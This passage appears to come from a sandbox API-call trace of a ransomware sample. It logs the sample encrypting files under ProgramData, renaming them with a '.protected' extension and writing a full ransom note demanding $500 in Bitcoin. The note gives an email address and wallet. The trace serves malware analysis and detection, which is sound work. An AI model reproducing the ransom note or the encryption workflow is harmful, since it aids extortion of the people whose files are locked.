pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.protected") returned 85 [0065.097] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h.protected")) returned 1 [0065.098] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.098] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="Windows") returned -1 [0065.098] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="Program Files") returned -1 [0065.098] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="Program Files (x86)") returned -1 [0065.098] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="$Recycle.bin") returned 1 [0065.098] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="System Volume Information") returned -1 [0065.098] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 76 [0065.098] StrStrIW (lpFirst="Help_MValidator.H1D", lpSrch=".protected") returned 0x0 [0065.098] lstrcmpW (lpString1="Help_MValidator.H1D", lpString2="RESTORE_FILES.txt") returned -1 [0065.098] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.098] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.098] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.099] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 76 [0065.099] StrStrW (lpFirst="Help_MValidator.H1D", lpSrch=".txt") returned 0x0 [0065.099] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 76 [0065.099] StrStrW (lpFirst="Help_MValidator.H1D", lpSrch=".rar") returned 0x0 [0065.099] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 76 [0065.099] StrStrW (lpFirst="Help_MValidator.H1D", lpSrch=".zip") returned 0x0 [0065.099] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.120] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.120] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.120] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.121] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.463] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 
[0065.463] CloseHandle (hObject=0x14c) returned 1 [0065.466] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.protected") returned 86 [0065.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d.protected")) returned 1 [0065.466] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.466] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="Windows") returned -1 [0065.466] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="Program Files") returned -1 [0065.466] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="Program Files (x86)") returned -1 [0065.466] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="$Recycle.bin") returned 1 [0065.466] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="System Volume Information") returned -1 [0065.466] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 76 [0065.467] StrStrIW (lpFirst="Help_MValidator.Lck", lpSrch=".protected") returned 0x0 [0065.467] lstrcmpW (lpString1="Help_MValidator.Lck", lpString2="RESTORE_FILES.txt") returned -1 [0065.467] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.467] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 
1 [0065.467] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.467] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 76 [0065.467] StrStrW (lpFirst="Help_MValidator.Lck", lpSrch=".txt") returned 0x0 [0065.467] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 76 [0065.467] StrStrW (lpFirst="Help_MValidator.Lck", lpSrch=".rar") returned 0x0 [0065.467] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 76 [0065.467] StrStrW (lpFirst="Help_MValidator.Lck", lpSrch=".zip") returned 0x0 [0065.467] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.482] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.482] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.482] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.482] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, 
lpOverlapped=0x0) returned 1 [0065.482] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.482] CloseHandle (hObject=0x14c) returned 1 [0065.483] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.protected") returned 86 [0065.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck.protected")) returned 1 [0065.483] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.483] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="Windows") returned -1 [0065.483] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="Program Files") returned -1 [0065.483] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="Program Files (x86)") returned -1 [0065.483] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="$Recycle.bin") returned 1 [0065.483] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="System Volume Information") returned -1 [0065.483] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 103 [0065.483] StrStrIW 
(lpFirst="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpSrch=".protected") returned 0x0 [0065.483] lstrcmpW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="RESTORE_FILES.txt") returned -1 [0065.483] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.483] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.483] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 103 [0065.483] StrStrW (lpFirst="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpSrch=".txt") returned 0x0 [0065.483] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 103 [0065.484] StrStrW (lpFirst="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpSrch=".rar") returned 0x0 [0065.484] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 103 [0065.484] StrStrW (lpFirst="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpSrch=".zip") returned 0x0 [0065.484] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 
[0065.485] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.485] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.485] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.485] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.502] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.502] CloseHandle (hObject=0x14c) returned 1 [0065.502] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected") returned 113 [0065.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q.protected")) returned 1 [0065.503] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0065.503] 
FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0065.503] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RESTORE_FILES.txt") returned 74 [0065.503] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0065.503] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.503] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0065.504] lstrlenA (lpString="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") returned 684 [0065.504] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0065.504] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.504] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0065.504] CloseHandle (hObject=0xd8) returned 1 [0065.504] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.504] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0065.504] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\RESTORE_FILES.txt") returned 68 [0065.505] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0065.505] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.505] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.505] lstrlenA (lpString="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") returned 684 [0065.505] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.505] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.505] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0065.505] CloseHandle (hObject=0xd4) returned 1 [0065.506] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0065.506] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0065.506] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\RESTORE_FILES.txt") returned 64 [0065.506] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.507] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.507] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0065.507] lstrlenA (lpString="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") returned 684 [0065.507] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0065.507] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.507] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0065.507] CloseHandle (hObject=0xb4) returned 1 [0065.507] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0065.508] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0065.508] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\RESTORE_FILES.txt") returned 57 [0065.508] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0065.508] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.508] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0065.508] lstrlenA (lpString="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") returned 684 [0065.508] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0065.509] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 